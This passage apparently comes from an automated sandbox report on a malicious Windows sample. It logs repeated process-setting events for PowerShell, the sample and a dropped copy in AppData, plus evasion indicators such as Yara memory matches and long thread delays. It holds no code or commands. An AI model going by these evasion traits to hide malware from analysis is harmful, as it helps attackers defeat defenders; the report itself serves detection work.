            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 7704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 7440, type: MEMORYSTR
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 9710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: A930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: B930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: BF40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: CF40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: DF40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: 4BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: 1030000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: 2BE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: 2A80000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: 9070000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: A070000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: A280000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: B280000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: B940000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: C940000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: F20000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: 28C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory allocated: F50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599438Jump to behavior
